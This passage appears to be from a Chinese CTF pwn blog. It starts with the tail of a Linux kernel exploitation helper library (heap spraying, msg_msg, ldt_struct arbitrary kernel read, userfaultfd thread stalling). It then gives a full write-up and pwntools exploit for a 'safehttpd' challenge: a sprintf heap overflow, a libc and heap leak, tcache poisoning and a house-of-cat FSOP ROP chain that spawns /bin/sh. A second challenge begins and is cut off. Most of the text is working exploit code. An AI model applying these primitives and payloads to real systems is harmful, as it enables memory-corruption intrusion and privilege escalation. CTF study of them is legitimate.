* make the noise less in allocating order-3 pages.
* So we pre-allocate the pages for those noisy objects there.
*/
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8 pages for page-level heap fengshui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
if (i % 21 == 0) {
free_page(pgv_1page_start_idx += 2);
}

/* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}

/**
* IV - keyctl related
*/

/**
* The MUSL also doesn't contain `keyctl.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

int key_alloc(char *description, void *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, void *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, void *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}

return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
* Somethings we may want to compile the exp binary with MUSL-GCC, which
* doesn't contain the `asm/ldt.h` file.
* As the file is small, I copy that directly to here :)
*/

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/* desc initializer */
static inline void init_desc(struct user_desc *desc)
{
/* init descriptor info */
desc->base_addr = 0xff0000;
desc->entry_number = 0x8000 / 8;
desc->limit = 0;
desc->seg_32bit = 0;
desc->contents = 0;
desc->limit_in_pages = 0;
desc->lm = 0;
desc->read_exec_only = 0;
desc->seg_not_present = 0;
desc->useable = 0;
}

/**
* @brief burte-force hitting page_offset_base by modifying ldt_struct
*
* @param ldt_cracker function to make the ldt_struct modifiable
* @param cracker_args args of ldt_cracker
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param burte_size size of each burte-force hitting
* @return size_t address of page_offset_base
*/
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
void *cracker_args,
void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args,
uint64_t burte_size)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t temp;
char *buf;
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_momdifier(momdifier_args, page_offset_base);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
break;
}
else if (retval == 0) {
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
page_offset_base += burte_size;
}

return page_offset_base;
}

/**
* @brief read the contents from a specific kernel memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param addr address of kernel memory to read
* @param res_buf buf to be written the data from kernel memory
*/
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, size_t addr, char *res_buf)
{
static char buf[0x8000];
struct user_desc desc;
uint64_t temp;
int pipe_fd[2];

/* init descriptor info */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child */
syscall(SYS_modify_ldt, 0, buf, 0x8000);
write(pipe_fd[1], buf, 0x8000);
exit(0);
} else {
/* parent */
wait(NULL);
read(pipe_fd[0], res_buf, 0x8000);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

/**
* @brief seek specific content in the memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param page_offset_base the page_offset_base we leakked before
* @param mem_finder your own function to search on a 0x8000-bytes buf.
* It should be like `size_t func(void *args, char *buf)` and the `buf`
* is where we store the data from kernel in ldt_seeking_memory().
* The return val should be the offset of the `buf`, `-1` for failure
* @param finder_args your own function's args
* @return size_t kernel addr of content to find, -1 for failure
*/
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, uint64_t page_offset_base,
size_t (*mem_finder)(void*, char *), void *finder_args)
{
static char buf[0x8000];
size_t search_addr, result_addr = -1, offset;

search_addr = page_offset_base;

while (1) {
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);

offset = mem_finder(finder_args, buf);
if (offset != -1) {
result_addr = search_addr + offset;
break;
}

search_addr += 0x8000;
}

return result_addr;
}

/**
* VIII - userfaultfd related code
*/

/**
* The MUSL also doesn't contain `userfaultfd.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure */
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

struct uffdio_range {
uint64_t start;
uint64_t len;
};

struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
void *buf, unsigned long len)
{
register_userfaultfd(monitor_thread, buf, len,
uffd_handler_for_stucking_thread);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif

safehttpd

1
GNU C Library (Ubuntu GLIBC 2.37-0ubuntu1) stable release version 2.37.
1
2
3
4
5
6
httpd: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=eaa5ba1189be005fab91f8b22ca2d02415cb5faa, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

由 setlocale 引发的 sprintf 堆溢出:

1
setlocale(LC_ALL, v3 + 1);
1
2
3
4
5
chunk = (Chunk *)malloc(0x40uLL);
chunk->data = (char *)malloc(size);
memset(chunk->data, 0, size);
chunk->size = size;
sprintf((char *)&chunk->info, "%-8s:%-13s:%-'8d", name, pswd, uid);
  • 本题目 libc 版本为 2.37-0ubuntu1 刚好存在此漏洞

入侵思路

题目有两次泄露的机会,先构造大量的 fast chunk,然后利用 fastbin 合并机制生成一个 unsorted chunk,利用 GET /init 功能不会置空 chunk 的特点可以用于泄露 libc_base

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
for i in range(0x20):
register(i,64,str(i))

for i in range(0x1f):
logoff(str(i))

register(1,1024,"1")

payload = "GET /init"
sl(payload)
payload = "Stdout: 3"
sl(payload)
sl("")

seed = lib.time(0)
lib.srand(seed)
pswd = ""

for i in range(13):
num = lib.rand() % 0x100
while(num >= 0x7f or num <= 0x20):
num = lib.rand() % 0x100
print(hex(num))
pswd += chr(num)
success(pswd)

show("root",pswd,1)

ru("Content-type: text/html")
leak_addr = u64(ru("\x7f")[-5:].ljust(8,b"\x00"))+0x7f*0x10000000000
libc_base = leak_addr - 0x1f72d0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

另外利用 passwd="a:0" 可以绕过如下的检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
__int64 __fastcall check(char *uid, int a2)
{
unsigned int v3; // [rsp+14h] [rbp-8h]
int i; // [rsp+18h] [rbp-4h]

v3 = 0;
for ( i = 0; i < a2; ++i )
{
if ( uid[i] > 0x2F && uid[i] <= 0x39 )
v3 = 10 * v3 + uid[i] - 0x30;
}
return v3;
}

接下来利用漏洞就可以使 sprintf 造成一字节的堆溢出,覆盖后续指针的末尾一字节为 \x00,进而释放一片正在使用的区域

利用堆风水可以释放一个正在使用的 info chunk(0x51),然后将其申请回来就可以使 new info chunk(0x51) 两次出现在循环链表中

  • 一次源自于覆写 info chunk(0x51) 为 new info chunk(0x51)
  • 另一次则是 new info chunk(0x51) 本身的插链

最后利用 UAF 劫持 tcache,申请并伪造 _IO_list_all 打 house fo cat 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
# -*- coding:utf-8 -*-
from pwn import *
from ctypes import *

arch = 64
challenge = './httpd1'

context.os='linux'
context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')
lib = cdll.LoadLibrary("libc.so.6")

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./debug/\n"
#b += "b *$rebase(0x353A)\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('122.9.149.82','9999')

def debug():
#gdb.attach(p,"")
gdb.attach(p,"b *$rebase(0x357C)\nb *$rebase(0x353A)\n")
#pause()

def cmd(op):
sla(">",str(op))

def register(uid,len,name,passwd="a"):
payload = "GET /register?uid={}&len={})&username={}&password={}".format(uid,str(len),name,passwd)
sl(payload)
payload = "Stdout: 3"
sl(payload)
sl("")

def logoff(name,passwd="a"):
payload = "GET /logoff?username={}&password={}".format(name,passwd)
sl(payload)
payload = "Stdout: 3"
sl(payload)
sl("")

def show(name,passwd,fd):
payload = "GET /show?username={}&password={}".format(name,passwd)
sl(payload)
payload = "Stdout: "+str(fd)
sl(payload)
sl("")

def setlocale_s(locale_setting):
payload = "GET /setlocale?locale={}".format(locale_setting)
sl(payload)
sl("")

def note(name,passwd,buffer,size):
payload = "POST /note?username={}&password={}".format(name,passwd)
sl(payload)

sleep(0.1)
payload = "Content-Length: "+str(size)
sl(payload)
sl("")

pause()
p.send(buffer)

backdook = 0x2562

for i in range(0x20):
register(i,64,str(i))

for i in range(0x1f):
logoff(str(i))

register(1,1024,"1")

payload = "GET /init"
sl(payload)
payload = "Stdout: 3"
sl(payload)
sl("")

seed = lib.time(0)
lib.srand(seed)
pswd = ""

for i in range(13):
num = lib.rand() % 0x100
while(num >= 0x7f or num <= 0x20):
num = lib.rand() % 0x100
print(hex(num))
pswd += chr(num)
success(pswd)

show("root",pswd,1)

ru("Content-type: text/html")
leak_addr = u64(ru("\x7f")[-5:].ljust(8,b"\x00"))+0x7f*0x10000000000
libc_base = leak_addr - 0x1f72d0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

strlen_got = libc_base + 0x1f6080
remaloc_got = libc_base + 0x1f6010
binsh = libc_base + 0x1b51d2
system = libc_base + libc.sym["system"]
execve = libc_base + libc.sym["execve"]
one_gadgets = [0x4e880,0xe3199,0xe31f3]
one_gadget = libc_base + one_gadgets[2]
_IO_list_all = libc_base + libc.sym["_IO_list_all"]
setcontext=libc_base+libc.sym['setcontext']

success("remaloc_got >> "+hex(remaloc_got))
success("_IO_list_all >> "+hex(_IO_list_all))
success("system >> "+hex(system))

setlocale_s("en_GB.UTF-8")
register(1000,64,"a"*8,passwd="b"*0xd)
register(1000,64,"a"*8,passwd="b"*0xd)
register(1000,256,"a"*8,passwd="b"*0xd)
register(1000,64,"c"*8,passwd="d"*0xd)
register(1000,64,"e"*8,passwd="f"*0xd)

logoff("e"*8,passwd="f"*0xd)
register(1000,16,"a"*8,passwd="b"*0xd)
register(1,64,"yyy",passwd="a:0")

logoff("yyy")
show("yyy","a",2)

ru(b"Content-type: text/html\r\n")
ru(b"\r\n")
leak_addr = u64(p.recv(5).ljust(8,b"\x00"))
heap_base = leak_addr*0x1000-0x2000
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

register(1,64,"yyy",passwd="a:0")
logoff("31")
logoff("yyy")

key = (heap_base+0x2200)>>12
payload = p64(_IO_list_all ^ key)
note("yyy","a",payload,16)

register(1,1024,"e"*8,passwd="a:0")
register(1,64,"yyy",passwd="a:0")

_IO_wfile_jumps = libc_base + libc.sym["_IO_wfile_jumps"]

next_chain = 1
fake_io_addr = heap_base + 0x22b0
payload_addr = heap_base + 0x23c8
flag_addr = heap_base + 0x23c8
socket_addr = heap_base + 0x2538

pop_rax_ret = libc_base + 0x0000000000040123
pop_rdi_ret = libc_base + 0x00000000000240e5
pop_rsi_ret = libc_base + 0x000000000002573e
pop_rdx_ret = libc_base + 0x0000000000026302
syscall_ret = libc_base + 0x00000000000e3559

fake_IO_FILE = b"./flag\x00".ljust(8,b"\x00") #_flags=rdi
fake_IO_FILE += p64(0)*7
fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE += p64(payload_addr-0xa0)#_IO_backup_base=rdx
fake_IO_FILE += p64(setcontext+61)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x68, b'\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x88, b'\x00')
fake_IO_FILE += p64(flag_addr) # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0xa0, b'\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, b'\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xd0, b'\x00')
fake_IO_FILE += p64(1)
fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00')
fake_IO_FILE += p64(_IO_wfile_jumps+0x30) # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40) # rax2_addr

payload = p64(flag_addr)

payload += p64(pop_rax_ret) + p64(59)
payload += p64(pop_rdi_ret) + p64(binsh)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(syscall_ret)

socket_data = p64(0x8108a8c00a1a0002)

note("e"*8,"a",fake_IO_FILE+payload+socket_data,0x400)

payload = p64(fake_io_addr)*8
note("yyy","a",payload,64)
success("setcontext+61 >> "+hex(setcontext+61))
success("execve >> "+hex(execve))
success("libc_base >> "+hex(libc_base))

#debug()
#pause()

payload = "GET /poweroff"
sl(payload)
sl("")

#cat flag 1>&0

p.interactive()

tpgctask

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9) stable release version 2.31.
1
2
3
4
5
6
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=964af918201c59dc08c1d903fa0bea90e91e87c9, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,Partial RELRO,NX

入侵思路

本题目的代码非常复杂,但功能却比较简单,几番尝试就发现了问题:

1
2
3
4
5
6
7
Take_Ruby("a"*0x8)
Take_Rod("b"*0x500)
Fuse_Weapon("c"*0x10)
Drop_Weapon()
Drop_Ruby()
Take_Ruby("d"*0x8)
Fuse_Weapon("e"*0x10)
1
2
3
4
5
6
[Weapon info]:
------------------------------
Ruby: dddddddd
